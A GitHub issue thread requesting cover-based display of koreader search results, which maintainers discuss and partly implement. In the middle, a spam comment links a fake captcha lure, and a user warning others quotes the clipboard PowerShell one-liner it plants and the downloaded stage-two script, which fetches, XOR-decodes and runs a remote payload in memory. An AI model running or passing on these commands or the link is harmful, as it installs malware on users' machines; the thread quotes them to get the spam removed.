### ISSUE TITLE
FR: Apply selected display mode to file and metadata search result items

### ISSUE THREAD

**Issue by arpanghosh8453** [koreader/koreader#12660]
**Does your feature request involve difficulty completing a task? Please describe.**

I would like to have the mosaic cover view like file browser/collection when I perform the file/metadata search. Currently it shows in a text-based list view with the filenames or titles and I find it harder to locate books with the names as text. 

**Describe the solution you'd like**

I would like to know if is it possible to apply the mosaic display mode to the search result items so that I can browse them with covers after searching for partial book title or tags from Calibre metadata

**Comment by pazos** [comment]
Nope, it isnt possible.

A long press on any result will show you metadata, including cover, if any.

I have no idea if the current widget used to show you results does support any kind of graphical elements on it. Anyways, it requires a lot of rework on the way we fetch covers.

Patches welcome. If you need to extend the widget just create a new one. Please also condider a base64 to blitbuffer function to quickly generate covers on demand from calibre meta instead of poking on each file metadata.

**Comment by ummm288** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by arpanghosh8453** [comment]
Hey @pazos, please remove the above spam comment by malicious user @ummm288 from this thread. It's injects a malware : https://www.youtube.com/watch?v=lSa_wHW1pgQ&t=601s ( A video from John Hammond on how this works )

It copies `powershell -WindowStyle Hidden ([ScriptBlock]::Create((irm https://javierlopez.eu/adapt/kingdom))).Invoke()` in the users clipboard and makes them to run this on their machine, installing the malware. 

the link resolves to the following 

```powershell
$url = "https://javierlopez.eu/adapt/cabbage"
$webClient = New-Object System.Net.WebClient
$sell61 = $webClient.DownloadData($url)

$gossip123 = 0x09, 0x04, 0x05

$struggle6 = [byte[]]::new($sell61.Length)

for ($i = 0; $i -lt $sell61.Length; $i++) {
    $struggle6[$i] = $sell61[$i] -bxor $gossip123[$i % $gossip123.Length]
}

$afraid16 = [System.AppDomain]::CurrentDomain.Load($struggle6)

if ($afraid16.EntryPoint -ne $null) {
    $afraid16.EntryPoint.Invoke($null, @($null))
} else {
    Write-Host "glass glimpse glue gloom"
}
```

This is a threat to other users visiting this thread. so please remove this from here.

**Comment by benoit-pierre** [comment]
Or don't click on the spammy comment links? It's not the only comment, a bunch of those were made at the same time.

**Comment by benoit-pierre** [comment]
Like ~30 or so. I have reported the user to Github.

**Comment by benoit-pierre** [comment]
I hoping they'll nuke the account and the comments too.

**Comment by NiLuJe** [comment]
Yeah, I caught a similar one somewhere else before bed, seems to have been taken care of ;).

**Comment by hius07** [comment]
Done in https://github.com/koreader/koreader/pull/13298.

**Comment by de3sw2aq1** [comment]
https://github.com/koreader/koreader/pull/13298 only implemented this for filesearcher. "calibre metadata search" still uses a non-coverbrowser UI. I would really like to use this UI to browse metadata results too. (Just for the actual book results, not the author/tag/etc browse UI)

Let me know if this issue could be reopened or if you'd like a separate FR for improving this other area of the UI to match. (Or if I missed some existing issues about this.)
